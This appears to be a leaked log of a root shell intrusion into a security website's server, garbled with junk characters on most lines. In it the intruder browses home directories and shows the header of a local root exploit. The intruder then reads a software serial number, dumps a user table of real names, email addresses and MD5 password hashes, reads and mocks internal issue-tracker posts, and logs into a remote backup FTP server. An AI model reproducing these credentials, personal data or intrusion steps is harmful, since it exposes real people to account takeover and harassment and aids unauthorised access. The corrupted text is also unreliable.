) L4 p2 i/ x+ y$ ^- s2 H* {% ?6 C6 Hsh-3.2# cd .., ]" l3 z: K2 q$ u4 p* r' I9 y# k
sh-3.2# cd com
; g6 K# f r" D7 z; bsh-3.2# ls -la
" `/ e% x5 C q& u. ^total 141208
' A) X0 h$ ]' D8 G! P3 r1 Bdrwx–x–x 10 com com 4096 Apr 28 12:40 .
& \! H; B8 K8 O1 t6 ~$ adrwxr-xr-x 14 root root 4096 Mar 11 17:56 ..# Y, K \- B+ k. m5 O! N" m
drwx—— 2 com com 4096 Jun 4 04:04 backups
( c/ m2 t$ \+ T8 J. J$ ^+ e q3 H-rw-r–r– 1 root root 2419504 Sep 28 2007 backup.sql8 f* g; f1 p1 S: S, q+ |/ o- p# B
drwxr-xr-x 2 com com 4096 May 12 15:20 backup_system/ X4 u1 b U S9 j6 G
-rw——- 1 com com 21880 Jun 2 08:07 .bash_history$ x/ n2 K) Q! j
-rw-r–r– 1 com com 24 Sep 24 2007 .bash_logout" j3 X& ~ a5 V
-rw-r–r– 1 com com 176 Sep 24 2007 .bash_profile
% ?# U D' A" w* t1 V-rw-r–r– 1 com com 124 Sep 24 2007 .bashrc5 V% Q" `# i" `+ |. x( T
drwx–x–x 3 com com 4096 Jan 29 2008 domains$ g+ R0 w1 U2 S3 d& ?% B
-rw-r–r– 1 com com 16409 Jul 16 2008 FWUser.class.php.fixed
0 ?/ ~% O- `3 d0 y- W$ R9 Ydrwxrwx— 3 com mail 4096 Jan 6 19:24 imap
G& g& T5 J9 N8 O- h5 t( l-rw——- 1 com com 69 Nov 18 2008 .lesshst
0 {$ p! a& i" ^& r+ l, u; S) Kdrwx—— 2 com com 4096 Sep 24 2007 mail
5 ^( V, Z0 Z! M/ V9 B, V' D h-rw——- 1 com com 13970 Mar 28 21:42 .mysql_history
$ z6 T& O. b4 l, Q/ ~" F) Xdrwxr-xr-x 2 com com 4096 Aug 20 2008 .ncftp
4 A+ X& z' |4 y. F+ v2 }lrwxrwxrwx 1 com com 37 Sep 24 2007 public_html -> ./domains/astalavista.com/public_html
+ l8 p e# C5 b% g-rw-r—– 1 com mail 34 Sep 24 2007 .shadow) ~6 b; N2 ?9 c3 T
drwx—— 2 com com 4096 Aug 26 2008 .ssh5 p& M3 c" a1 o
-rwx—— 1 com com 8515 Feb 10 2008 t* H2 c. z- g/ S/ C) o' c
-rw-rw-r– 1 com com 6265 Feb 11 2008 t.c
9 u+ x- l$ i" T6 d3 ^5 |+ Y Adrwxrwxr-x 2 com com 4096 Jan 30 15:47 tmp
z1 N' u, k* ?; i-rw-rw-r– 1 com com 617 May 20 2008 .toprc
. O0 O3 v$ c" W$ q-rw-rw-r– 1 com com 141851766 May 19 2008 version2-backup-20080519-0900.sql. c/ u0 Z# |/ j
-rw——- 1 com com 16629 Mar 28 21:46 .viminfo. J* W; a9 I% B
-rw-rw-r– 1 com com 51 Aug 25 2008 .vimrc
% R8 K3 ~& `; m/ J6 x/ v7 k: w3 }$ S( L; o
sh-3.2# head t.c" E9 F1 q8 A$ f& w7 i
/*
X% j0 g& r! g* jessica_biel_naked_in_my_bed.c
% X+ L+ k7 |+ X& \2 B; o# J) ]*
' ~% g- }8 {) o1 m3 u8 ^4 L( ]* Dovalim z knajpy a cumim ze Wojta zas nema co robit, kura.
+ u$ K6 E1 R3 A+ u8 p* Gizdi, tutaj mate cosyk na hrani, kym aj totok vykeca.
9 m4 v3 L) m5 |: s) |* Stejnak je to stare jak cyp a aj jakesyk rozbite.
/ S7 f% B. Z: N) S( F: t*& t- T0 W2 A7 L1 K
* Linux vmsplice Local Root Exploit& l# E- Z& C* F
* By qaaz7 Q+ G& k. H; Z. i( {
*
, f5 T" q+ b; I1 e
* j* |- [5 J; {sh-3.2# cd /
6 ^' s4 f9 J4 u: q, Fsh-3.2# ls -la; f3 G0 q6 _7 l; _; ~
total 360
; s* f, t5 b. Z; Ydrwxr-xr-x 25 root root 4096 Jun 3 02:43 .
4 ? i9 N" x, d" Mdrwxr-xr-x 25 root root 4096 Jun 3 02:43 ..
+ f! U, U5 U( s% Q' {: b9 B-rw——- 1 root root 10240 Jun 3 02:39 aquota.group) N, ~; j G0 @+ c6 x8 j
-rw——- 1 root root 10240 Jun 3 02:39 aquota.user( N, f% g; B% {0 V- Z" m; L8 I) f
-rw-r—– 1 root root 819 Jul 17 2008 astalavista.us.db8 y3 Y5 d6 s$ t- R% h0 F/ V
-rw-r–r– 1 root root 0 Jun 3 02:43 .autofsck% o+ r9 J3 \% H, i D4 P
-rw-r–r– 1 root root 0 Sep 16 2007 .autorelabel x' B+ p" a7 U3 H' V
drwxr-xr-x 3 root root 4096 Dec 29 2007 backup2 a% s% c. c6 J H- S- \5 G8 _* z
drwxr-xr-x 2 root root 4096 Jun 4 04:03 bin/ q, R0 Z% \; @* u0 u
drwxr-xr-x 5 root root 4096 Jun 2 14:06 boot
% S3 M8 D/ J* D. \drwxr-xr-x 11 root root 3620 Jun 3 02:43 dev3 h6 Q0 R5 o2 M4 n7 Q& h
drwxr-xr-x 84 root root 12288 Jun 4 03:16 etc
0 C3 Z7 y& e9 V: Q1 rdrwxr-xr-x 14 root root 4096 Mar 11 17:56 home
6 w7 |1 A7 B, |& D( b-rw-r–r– 1 root root 13387 Mar 20 2008 httpd.conf. T$ Y/ ^1 m8 E3 F& M
drwxr-xr-x 11 root root 4096 Jun 4 04:02 lib
0 c) `* d0 ~' Kdrwxr-xr-x 7 root root 4096 Jun 4 04:03 lib64
$ U9 b8 l' ?0 U: ~% {drwx—— 2 root root 16384 Sep 11 2007 lost+found% N" J H, L& f+ T
drwxr-xr-x 2 root root 4096 Mar 11 17:56 media* p3 f9 @, r% N" B9 D
drwxr-xr-x 2 root root 0 Jun 3 02:43 misc% B" M6 R. \2 C
drwxr-xr-x 2 root root 4096 Mar 11 17:56 mnt) a" N. `; j( `7 Z0 j0 D% y
-rw-r–r– 1 root root 5859 Feb 3 2008 mrtg.cfg
6 ~1 a" l) s# U& q( d& sdrwxr-xr-x 2 root root 0 Jun 3 02:43 net# A5 ^6 [0 n* T9 n
drwxr-xr-x 3 root root 4096 Mar 11 17:56 opt h: [+ ~) B' ?
dr-xr-xr-x 264 root root 0 Jun 3 02:42 proc
% S& d' ~9 M0 @- A( A. k1 p& ]drwxr-x— 15 root root 4096 Jun 4 08:40 root; S" Y3 y& s G
drwxr-xr-x 2 root root 12288 Jun 4 04:03 sbin( P! x/ k6 R* z7 n- Z) e& d- B
drwxr-xr-x 2 root root 4096 Mar 11 17:56 selinux1 h! b4 P g4 `2 D% ]
drwxr-xr-x 2 root root 4096 Mar 11 17:56 srv
0 x7 s! w+ v" B8 @drwxr-xr-x 11 root root 0 Jun 3 02:42 sys
4 ^3 _( ]9 W/ d8 P: cdrwxrwxrwt 4 root root 122880 Jun 4 10:35 tmp
; f: e3 O! E& x- tdrwxr-xr-x 16 root root 4096 Jun 2 13:56 usr
+ T$ ?! p2 u: B) ~# A; u4 ^- Y4 F( cdrwxr-xr-x 26 root root 4096 Jun 4 03:16 var
( i1 y8 V0 R: n& R) [$ p2 O
; v: O3 @4 |: Y2 e+ k0 B3 r+ ash-3.2# cd opt
9 l: |/ k3 x8 ]1 H( Q: ksh-3.2# ls -la$ R4 ^5 u, S8 `8 S8 K
total 20
, E+ m2 _& U% \0 G% J; ?drwxr-xr-x 3 root root 4096 Mar 11 17:56 .+ z2 R% a o) E0 O
drwxr-xr-x 25 root root 4096 Jun 3 02:43 ..+ O$ E, V' [" t8 _% L2 d
drwxr-xr-x 15 root root 4096 Mar 20 2008 lsws
F! q5 t, o. _! }$ L$ ~* q$ U8 L9 L9 G" \8 F
sh-3.2# cd lsws/0 s1 d5 n" d, ~* M9 j
sh-3.2# ls -la, U+ I R0 l" v6 f" O
total 108
7 E% s5 U; l0 }drwxr-xr-x 15 root root 4096 Mar 20 2008 .
' Z7 u4 h2 H: K+ V" Fdrwxr-xr-x 3 root root 4096 Mar 11 17:56 ..
% }( c8 V2 O, D8 D( _5 |7 cdrwxr-xr-x 8 root root 4096 Mar 20 2008 add-ons
* x; E) p) ]- {1 {- \) O2 s ndrwxr-xr-x 13 root root 4096 May 29 15:10 admin
; ?1 X/ |: l* [) |& ^& Ndrwxr-xr-x 5 apache apache 4096 May 29 15:10 autoupdate
( d) {/ [; N7 M1 fdrwxr-xr-x 2 root root 4096 May 29 15:10 bin
2 A9 t0 j0 i$ b4 X* K+ H. zdrwx—— 4 apache apache 4096 Jun 3 02:43 conf
( ~- m$ i p* ^6 p1 ^drwxr-xr-x 7 apache apache 4096 Mar 20 2008 DEFAULT
0 S# Y! @" N/ i# Z U5 Tdrwxr-xr-x 2 root root 4096 Sep 15 2008 docs, D/ y! ^7 u' E" l0 l; `
drwxr-xr-x 2 root root 4096 May 29 15:10 fcgi-bin
/ W' t/ w3 F; ?+ \, M7 ~* Gdrwxr-xr-x 2 root root 4096 Sep 15 2008 lib
( q6 c3 @* i2 ?$ _& }-rw-r–r– 1 root root 6959 May 29 15:10 LICENSE& r& v( K( p( N* C O% j1 a. s& o
-rw-r–r– 1 root root 2214 May 29 15:10 LICENSE.OpenLDAP$ f8 \+ Y8 z# [7 t( f$ r, [
-rw-r–r– 1 root root 6279 May 29 15:10 LICENSE.OpenSSL
: E$ [! O7 o% y. m2 Y; s, \4 c-rw-r–r– 1 root root 3208 May 29 15:10 LICENSE.PHP4 k. x9 ~) Y( e0 a5 z/ M' b8 t6 c
drwxr-xr-x 2 root root 20480 Jun 4 09:55 logs
* g- g- k& d5 U ^ N% idrwxr-xr-x 2 root root 4096 Mar 20 2008 php
" N. G8 E! L6 i, N0 Z' s# |, Rdrwx—— 2 apache apache 4096 Mar 20 2008 phpbuild
0 [0 m( ~! _% @$ C3 Mdrwxr-xr-x 3 root root 4096 Mar 20 2008 share
6 D0 S0 z, Q+ {- y5 \ i0 ^-rw-r–r– 1 root root 6 May 29 15:10 VERSION5 D( i1 ^5 g" @/ |, E
) k6 u, U& E# M8 S* c& ksh-3.2# cd conf- w3 e8 q* \% W- V2 I
sh-3.2# ls -la" J9 L0 U" P/ [, T* k6 m( x
total 48
! j1 N( V* g1 u2 v9 n& H) c: ?/ g. jdrwx—— 4 apache apache 4096 Jun 3 02:43 .$ o$ j: k; [/ d
drwxr-xr-x 15 root root 4096 Mar 20 2008 ... h+ `8 X. p7 T8 \8 M5 d8 ?$ g" k, `! S. e+ L
drwx—— 2 apache apache 4096 Mar 20 2008 cert; E# s2 ?* f! g4 O! B9 {2 d
-rw-r–r– 1 apache apache 6668 May 29 15:13 httpd_config.xml; t, ?% v \% x8 j% L
-rw——- 1 apache apache 6613 May 27 18:33 httpd_config.xml.bak
* B6 i" |- ~2 p9 C7 b/ T-rw-r–r– 1 root apache 0 Jun 3 14:11 .last
* L! I* @' c* N& Q- Y# W' n% a! o% o-rw——- 1 apache apache 256 May 29 15:10 license.key
# i7 x& B5 V8 C: g7 w* t! t-rw——- 1 apache apache 256 Mar 21 2008 license.key.old
- l& w1 i& {6 t; H" J-rw——- 1 apache apache 3320 Mar 20 2008 mime.properties
* J9 M9 F E1 ~6 p2 U-rw——- 1 apache apache 20 May 29 15:10 serial.no
: z, i* |) B4 k) c) Ddrwx—— 2 apache apache 4096 Mar 20 2008 templates
7 @ j: `2 ?* H; j2 G7 K: l; T+ e/ I: }+ a& K$ u, z$ \2 a
sh-3.2# cat serial.no, h! d- [" M0 f& H1 i
IbDl-oVsO-CKqL-wVRa- |0 ]! \$ n. u8 t( T& {4 h! H' w- V4 E
: R2 J8 U4 i' D0 m% tsh-3.2# mysql
9 @2 a/ A4 j5 N3 KWelcome to the MySQL monitor. Commands end with ; or \g.
- h. P. N$ w) _5 p4 \Your MySQL connection id is 286844
8 t, B$ f- f& `" o6 a6 sServer version: 5.0.45-community-log MySQL Community Edition (GPL)! O- V# N% _6 B! V1 J0 t
" O2 r7 _+ p, n1 l
Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.* g6 c# D# O+ Y7 \) t3 f- P
4 ~4 _4 O. J# e
mysql> show databases;
) f" |+ y0 x7 l/ K+———————–+
: [+ l ~5 |& y/ {| Database |+ f% b( B$ n* u; B
+———————–+* J J3 D5 B7 f# J& y0 c/ g
| information_schema |: ^8 n! d7 N0 i3 _. ~2 H
| astanet_ads |0 D/ d: I+ X6 r9 L, S6 s' f9 X
| astanet_mailing_lists |/ x4 m0 R2 G8 j/ t
| astanet_mediawiki |6 ~' C, \* w; k! w* d
| astanet_membersystem |
- y1 p2 I& e/ ~; S| com_contrexx |6 x6 n7 p% U- _8 E9 y" t4 n$ ?( F
| com_contrexx2 |) z' j* N" O2 \/ p1 S: E( V' _, j
| com_contrexx2_live |1 f. a2 U J# c
| da_roundcube |8 G6 P& f7 m2 J3 m# e% E" ^# }6 y
| dolphin |
s3 k9 {. f$ A| ideapool |
0 e, S. b% a4 ]! x$ W| mysql |9 W; y. l% J" f& G( r- G( B- S
| test |$ o4 Q# Z( y% S; w' s, |! F
| yourmaster |
5 V2 q! }$ j9 u& }+———————–+
, ~: \, ^! e7 s% U14 rows in set (0.00 sec)
+ m( X$ u5 }4 X% K4 f4 u: T# S9 U* P7 p) Y! L: N0 B8 T) L5 n0 ~
mysql> use ideapool
0 s6 p5 `* l- R4 _8 {$ ZDatabase changed
/ H- D" M q. U$ X3 _mysql> show tables;& t! h# C% o3 A# a& ]
+———————————–+
* i4 b6 \% L( U* [) T| Tables_in_ideapool |- k1 w& U" P w3 ~3 v7 @
+———————————–+4 A! t6 y: F% a& T( b( ^9 A
| eventum_columns_to_display |
5 w# g( m/ n* `0 z| eventum_custom_field |9 ^1 ^4 }3 a7 E3 f9 o. w3 {1 _
| eventum_custom_field_option |
& y7 m6 Q r/ g7 z; G5 C; ^ k| eventum_custom_filter |9 a7 l2 t. ^5 S$ K. p' p2 P
| eventum_customer_account_manager |
9 e: [5 z8 G' t! N! \; E% ?| eventum_customer_note |
$ ]4 o9 q% E6 O; S8 e) j1 }| eventum_email_account |
k& `$ X5 I" l+ a| eventum_email_draft |4 P2 x2 I: p9 Z2 ~5 }& D! L9 |
| eventum_email_draft_recipient |( \' N" d1 {, b7 ?
| eventum_email_response |: i& b5 u1 e: a$ L e* k
| eventum_faq |
- k) s3 b! ~+ q8 \ v2 g| eventum_faq_support_level |0 Z# s0 j( V" D! x: [5 E% K
| eventum_group |
{) o' G: y8 L| eventum_history_type |. ?1 a( B; u: v, a7 a+ A. _; ]
| eventum_irc_notice |
7 ]& B v1 ?3 @1 a* u| eventum_issue |
+ g& D6 y6 x6 q" E' D) m* F| eventum_issue_association |
) `# P$ b% l' d8 r- a/ F| eventum_issue_attachment |
- G1 d' K8 J4 h/ p2 p1 D| eventum_issue_attachment_file |/ L% i O G# ]# B9 `. Z# L
| eventum_issue_checkin |6 k. d: G" v9 y6 S. o o, s
| eventum_issue_custom_field |
, m1 h5 e \$ h: f- Q, L; h| eventum_issue_history |
* _$ S& P& s, O H/ Z/ b/ V| eventum_issue_quarantine |
1 H. F) N5 s$ N$ {) {! b- Q: [| eventum_issue_requirement |
4 D/ w5 e5 m" h0 u* B| eventum_issue_user |
' N, w. Z q- W; O3 ^, K| eventum_issue_user_replier |
4 e; c- h3 s. U" U% Z| eventum_link_filter |9 Y1 C7 d# K+ G0 I8 @
| eventum_mail_queue |8 o3 [. t5 V/ v0 j* v1 ^4 {/ f
| eventum_mail_queue_log |5 P9 r- Q4 Y" }) m+ E. ~" K+ G1 z8 `
| eventum_news |- \/ I; ?. K' I: _5 B2 C
| eventum_note |
$ }. k/ q# |- h4 u$ [( Z" ]| eventum_phone_support |
& S$ k! F, Z2 r; ?! Z; J, _6 Q: p| eventum_project |3 H& J& i% @) i( {0 u
| eventum_project_category |- P+ ]2 T+ |2 X
| eventum_project_custom_field |3 m5 J' w# c! I; q% [: Q _
| eventum_project_email_response |$ A5 y3 H+ G3 k" o( v; l5 `* }
| eventum_project_field_display |* T! \. y0 p7 t2 o6 B
| eventum_project_group |3 S9 J) t1 L% N6 W+ n
| eventum_project_link_filter |+ g" L$ y' v6 c# j0 } C
| eventum_project_news |
1 y q) ?0 Z6 N- y8 p* C- I| eventum_project_phone_category |
( q, R* \; |$ t H+ o| eventum_project_priority |. H9 }0 y0 N8 q- e4 a
| eventum_project_release |
) B0 Z0 E' z; }9 C4 u| eventum_project_round_robin |
5 I+ |3 V% T5 B9 h- K# C* Z| eventum_project_status |
2 @- c! e% E$ V! R* P| eventum_project_status_date |
$ l5 s* x- C& Y" v3 q* e| eventum_project_user |) \0 Q0 b( d" T0 W5 R
| eventum_reminder_action |* [8 ]) @) U, ]- i7 ?
| eventum_reminder_action_list |' }* _9 O2 r3 g5 E' I& @5 S1 V
| eventum_reminder_action_type |
) q d+ d! {) Y; E* f| eventum_reminder_field |5 V) g' r: W" d' D4 v$ g
| eventum_reminder_history |
# B1 [. }4 h H: t! Z! o2 T: p" q| eventum_reminder_level |
F& a6 y" d: K; Q& A& p) F| eventum_reminder_level_condition |& n. q2 r0 C+ b" ]/ r9 j: D% h
| eventum_reminder_operator |
5 F( m* T, S8 |7 @( Z| eventum_reminder_priority |$ L' A' k5 p3 {" ]0 v3 [4 Z3 `
| eventum_reminder_requirement |
# U! m! ?9 B( j! N5 C% a1 ^| eventum_reminder_triggered_action |
' X/ M; x# a# ?| eventum_resolution |, T$ m0 j( v( [, `
| eventum_round_robin_user |- A' N* n d2 _5 e5 b% G p% t
| eventum_search_profile |9 e" v4 Q6 z$ M
| eventum_status |
0 A6 F0 M2 z( ?: h, J| eventum_subscription |
! [" w" k% `" a: D6 v4 L| eventum_subscription_type |
3 w$ ?9 P3 E# A| eventum_support_email |
' r8 X; j$ c5 {# X! ~- H9 c| eventum_support_email_body |/ Q$ i! x) J* Z9 v; ?; _
| eventum_time_tracking |
0 i% r; L* S, T% P: O| eventum_time_tracking_category |
4 M% E. d+ Z+ d( O" y- U| eventum_user |
3 U, N1 U8 `/ w2 I/ g9 v+———————————–+. b7 e# @! ^/ h( x7 X3 ]+ Q
69 rows in set (0.00 sec)3 ?- g: K, c& Z1 U3 ?4 c e
7 k6 w/ Q% r/ {7 O) w
mysql> describe eventum_user;, E; G& J$ s& G3 z: m+ v
+————————-+——————+——+—–+———————+—————-+
4 y; H5 e" T4 n2 A& E8 O4 n- ~) @8 l1 s| Field | Type | Null | Key | Default | Extra |
- U4 [% C3 G7 e% \7 z+————————-+——————+——+—–+———————+—————-+
6 D, S. e) G9 N# K4 n3 G| usr_id | int(11) unsigned | NO | PRI | NULL | auto_increment |2 @1 S5 `4 {. K
| usr_grp_id | int(11) unsigned | YES | MUL | NULL | |
+ x& b+ s7 v; G1 K2 c* N! X| usr_customer_id | int(11) unsigned | YES | | NULL | |$ I- C+ T0 B5 v( s' W9 e
| usr_customer_contact_id | int(11) unsigned | YES | | NULL | |, {: v- u" a) \% h2 W
| usr_created_date | datetime | NO | | 0000-00-00 00:00:00 | |' Z8 m9 P, N/ i1 `- P9 }7 n: N8 Q
| usr_status | varchar(8) | NO | | active | | \ R9 N7 R: C3 N7 s4 F
| usr_password | varchar(32) | NO | | | |: H9 a( `* m4 A+ p6 V. V
| usr_full_name | varchar(255) | NO | | | |, D# }# h, s7 ^& ?, C- z
| usr_email | varchar(255) | NO | UNI | | |0 _$ V& d* M" H
| usr_preferences | longtext | YES | | NULL | |! I7 d2 E) Z+ u
| usr_sms_email | varchar(255) | YES | | NULL | |
' a! g$ U0 v2 m$ A: c- [' e0 \| usr_clocked_in | tinyint(1) | YES | | 0 | |
" M) x! D1 j$ A \- x; e| usr_lang | varchar(5) | YES | | NULL | |+ |1 Y* }" A- A$ [1 P, V/ H4 C
+————————-+——————+——+—–+———————+—————-+! J0 q1 n- [$ R* q' `1 Z* K2 \
13 rows in set (0.00 sec)
5 ]6 ?/ Q" V9 p: x6 V2 t- ^8 }3 W4 k% D" u' v0 h, X0 {- q
mysql> select usr_full_name,usr_email,usr_password from eventum_user;4 }, W% w' _7 a# i/ g
+———————-+——————————-+———————————-+
4 l1 {1 }5 n) Y: G; g| usr_full_name | usr_email | usr_password |, K& R9 u# d4 b! r
+———————-+——————————-+———————————-+
1 e# F/ \' y+ b. v| system | 链接标记system-account@example.com | 14589714398751513457adf349173434 |3 r8 x/ Y4 M ?' d& e& k
| Developer (Paulo) | 链接标记paulo.santos@astalavista.ch | 26a35a1cf8895c27fb37ef4cf149f7bb |$ c, F! {* }3 \& K& n$ X
| Be1er0ph0r | 链接标记be1er0ph0r@gmx.de | 229766dc0ca1fb67160a8782321dfdce |$ k' \! F) q+ ^* e T% U2 `$ \4 H7 T
| Admin | 链接标记pascal.mittner@astalavista.ch | 57c2877c1d84c4b49f3289657deca65c |% S) _) ~% A. \7 o$ ?! x1 `9 a8 z
| ADMIN | 链接标记admin@astalavista.ch | f6fdffe48c908deb0f4c3bd36c032e72 |$ O* I1 z* ^- W" l' n
| USER | 链接标记user@astalavista.ch | 5cc32e366c87c4cb49e4309b75f57d64 |
; z6 N0 R8 m5 Q- g- d$ e! L& u1 @8 U| Glafkos - (nowayout) | 链接标记glafkos@astalavista.com | f7735ab119023a8abb2301e67f81cd67 |
) z5 Y" I! l, K: X& |: a9 H| Joao | 链接标记joao.pontes@astalavista.net | f805c071d7c823b937448c54c047b9fd |( W/ {4 M- A' \; X
| Pascal | 链接标记pm@astalavista.ch | e10adc3949ba59abbe56e057f20f883e |
7 D0 w; K; p% _( w| commander | 链接标记commander@astalavista.com | 932cd250918f881d41feb0b93883a926 |) E! h8 ]; N; {5 ~2 ?/ } k1 [
| ishtus | 链接标记ishtus@astalavista.com | a587ffc88b3dbbba3fd2fe67af649ff0 |/ O% V2 [% T1 M7 n4 p: ?% P/ Q
| sykadul | 链接标记sykadul@astalavista.com | 20224a2f3eeb57a13a10b4df543c128e |- v8 W n* k' ?4 n8 C. P I5 }
| Zach McElroy | 链接标记admin@badfoo.net | 33c5d4954da881814420f3ba39772644 |" m% q! ^' x. ?" c
| usb | 链接标记usbenigma@hushmail.com | b513f22c3db6932855ad732f5f8a10a2 |
" x3 V* n( x$ ?6 E+ v| cyph3r | 链接标记cyph3r@astalavista.com | 6e1e50017a945e874d52ec91f9ab2cee |1 Q3 @( R1 e, J _/ X+ }6 B5 _
+———————-+——————————-+———————————-+
: F- ~" R+ m. H! |- m( i _15 rows in set (0.00 sec), e8 f, `. y0 i, j1 Z3 s0 p
/ X u/ b" P' @3 y
mysql> select iss_description from eventum_issue where iss_id = 43;
* J# n/ M$ n7 S$ |1 ^+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+0 z' j1 `2 {4 [5 U! W
| iss_description
( c7 ?: [9 z' h|* p5 q% [6 R" x7 `7 J+ X
+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+. {" n* t' A5 Z
| Ok guys, to boost our traffic and revenue what we have to do is keep users logged in… how to do that? well think about it… if a user is watching a movie… he’ll be4 {# i2 T" ?4 p$ l, O# K
connected for 90 mins… 120mins… so what i propose is something like:
" E8 [8 U5 x p/ N; L/ {" f" q链接标记[url]http://www.surfthechannel.com/[/url]* O! J/ T# |' M/ X0 d' K6 O% H
since they only provide LINKS to the movies they are LEGAL and don’t break DMCA rules… so we could do the same… “iframe” the content on our website or use a system
. [% B5 Q( Z1 m( D- M- Elike podcast that uses our own flash player to stream content from other places, therefore the content NOT BEING HOSTED ON OUR SERVERS but only viewed… which doesn’t1 \+ b) \# b6 x6 ]5 V5 {2 S
break any laws as far as i am aware (we should research on that just to be sure though!) Of course we would have to provide users with the button to take the content off7 X5 j! e; i/ A; ~6 E
if they think it breaks copyright laws and we will remove it… i think that makes it on the border of DMCA…
7 C4 ]2 i Z2 ~ W
. A) r) G9 C2 A: X/ K; P4 ~ n# AWe could also put advertisement during play on the flash video player itself… extra $$…
7 T8 U1 x& @% `+ C L2 {# e: U+ m7 I0 S
By sykadul |
- V* P7 @9 c+ O2 c+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+
1 x6 _* f! _% G/ D$ d4 F1 row in set (0.00 sec)# u) K' [3 r4 s' B7 I4 f
4 m3 w' Z$ d# Z4 w9 V9 m; x% r9 H) a+ s
// Money and extra $$ is all they care about. remember that.
( _5 X, ^/ B) j6 q0 ], l2 w
6 f T3 H% O# z. y2 Dmysql> select iss_summary,iss_description from eventum_issue where iss_id =42;5 @. S- f2 W, {6 b3 o! D) ~- S6 \3 O
+————————+——————————————————————————————————————————————————————————————————————————————-+
" r2 E; @0 b! Q2 t3 [| iss_summary | iss_description ! L4 {7 R% `$ ]* _6 A
| u: N2 ]) C* C9 A8 p
+————————+——————————————————————————————————————————————————————————————————————————————-+, ]+ T* O. f1 o0 O) g
| Forum for REAL EXPERTS | Hello,
- X! A p2 X2 C( ~) n# s6 L, G2 d3 X, @% m+ y, t
Ishtus and I,$ u3 t) t: W+ ~% f9 D
2 |* G8 M7 @6 M, x
Came up with a crazy and very workable and professional idea. We create an invitation only forum with the BEST security experts worldwide
m% ]' p b& f1 m8 L2 q* MONLY. Security Experts from Bugtraq lists, exploit writters, reverse engineers etc..) k6 Z; _! e* i! w
8 l( u5 b" O$ u* G9 KOne example a friend of mine from coresecurity.com!
" A/ R S c2 a6 o! R% H/ h
, E& V% I# A, X2 u( N+ UWe could have big projects etc.. and we can work all together to bring to the security community exploits, open source software etc..
8 ]" ?) z- R+ ^0 R5 n+ u
5 C: l- {! V1 y5 y; Z. K( i: Y/ f4 i7 o|2 l; V h" x( U4 i6 e, h0 ?8 }
+————————+——————————————————————————————————————————————————————————————————————————————+
; a) ~6 s0 L3 o+ v% Y# L0 z( {1 row in set (0.00 sec)
/ a9 h: v( L$ z Q/ _
1 J; i- A0 I8 C// What an awesome yet original idea Ishtus and him… bring MORE security “experts”, thats exactly what the world needs…8 H5 t2 s5 `- R/ \0 ]* a1 s3 s8 ~, v
8 Y }( a( A# }
mysql> select iss_summary,iss_description from eventum_issue where iss_id = 16;
: ~" ?/ ?) P. x, I9 T+——————+———————————————————————————————+1 x2 G2 [" g) h" Q
| iss_summary | iss_description |
' E3 I* j' I/ S! F* y1 s+——————+———————————————————————————————+9 }1 _1 r6 o: L# m* ~4 n" J& C
| Website guidance | Virtual Girl which guides you trought the website.
7 N" m" C3 v3 `" g$ c
( n% f5 i8 W2 k, tWe need a girl with who you can ( talk )!!!
0 ]; o) p3 ~: H; }' B% P+ B2 aAlso for the News!
8 q- W$ [ {. ~1 K- r4 M9 q9 _So my suggestion is a girl who read you the news loud if you like!. l6 s3 I5 b8 S n/ g
you can choose between read yourselfe or she read it for you or both!' s6 Q/ X+ f6 k5 D/ v! r$ Q& A
+ F, l2 }, I q8 `6 B) Y/ ]Go to 链接标记[url]www.heise.de[/url]! There is an example for Voice News! It’s a good thing!!!) h; U& b9 Z4 U' M* }' n
( g1 c/ M" k, lHave a look on the example girls!!# w& d5 s- a- A d$ K" E$ P9 ^
* w5 L' y* U' M' V, a1 |# D链接标记[url]http://www.yaoti.com/de/free_yaoti.html[/url]8 ]. l/ O0 ? O2 W- w- H- B: `
4 a9 X2 ?' @: Q* @2 xor that8 [: K7 W% x7 m0 g. D; r
( i0 M9 G1 V: U0 V链接标记[url]http://www.yellostrom.de/[/url]8 \" e* [2 m9 y4 a3 @3 j) l" n
# L4 ^# H3 I2 X( x|
6 g9 {1 F3 B6 N+——————+———————————————————————————————+0 Y: v5 \7 _, h+ @* q* j
1 row in set (0.00 sec)6 }$ H! d8 M) ]6 l1 i0 W
- G8 C2 j q" T' Q+ p, k// ha ha.5 v% R6 F; f* ^' t' v& l) L
6 a |8 w7 h7 R; \; {
mysql> select iss_summary,iss_description from eventum_issue where iss_id = 7;
9 q3 _; c+ V7 A. a, T+————————–+———————————————————————————————————–+8 n+ b9 N$ \4 Q3 V: a5 S1 ?
| iss_summary | iss_description |2 R% q# M9 d/ | H1 h
+————————–+———————————————————————————————————–+0 R' N" l; e, p: x$ [- W
| Exploit Development Team | We need an exploit development team to focus on exploit research and publication under Astalavista name. |
9 l3 z1 O* }# q) F5 h+————————–+———————————————————————————————————–+
7 d# ^+ ?+ u7 b/ A P1 }1 row in set (0.00 sec)4 N8 p9 l1 @ D- g% G; m: F* K
! K% ]/ e1 ~; h! L
// LOL.
* z% h6 \8 N5 e6 [9 m; Y3 @- \: g3 F; P3 C% a
mysql> exit
3 M* S, P. D# t \3 H+ IBye
* j+ e' d( J# J# d3 D" k/ t
! G. K4 L& `4 C$ Y( V2 ush-3.2# ftp 212.254.194.163' F9 k% n! H6 i+ l' v e
Connected to 212.254.194.163.) C7 Q4 ?& i" F5 T# `, B
220 BackupCOM_VW FTP server ready.
5 O g4 b- h7 c( d* g! ~: e6 B504 AUTH: security mechanism ‘GSSAPI’ not supported.! X4 @ s! i; `, e
504 AUTH: security mechanism ‘KERBEROS_V4′ not supported.# G# s' T6 w# {, j, e- w7 ?- R
KERBEROS_V4 rejected as an authentication type
4 z( \- Y' w7 D, T+ QName (212.254.194.163:root): astalavista.com
$ o j$ H( x. c3 O* t4 a331 Password required for astalavista.com.) z/ s. ?) M& [1 N' E3 }9 A# k; l/ m
Password:6 x3 L) }! }3 [% G# a
230 User astalavista.com logged in.7 G' }) [$ F! C e* z; |) e5 {
Remote system type is UNIX.
6 F- A: b9 J) c* ^( e7 {Using binary mode to transfer files.
$ g6 `. V: M2 t* ~( U3 Qftp> ls -la0 s8 K( a2 I# m# L' N% g3 @ B
227 Entering Passive Mode (212,254,194,163,2,188): k* H) R8 s) Q; _9 N
150 Opening BINARY mode data connection for ‘file list’.0 Q$ }" h6 }) ?
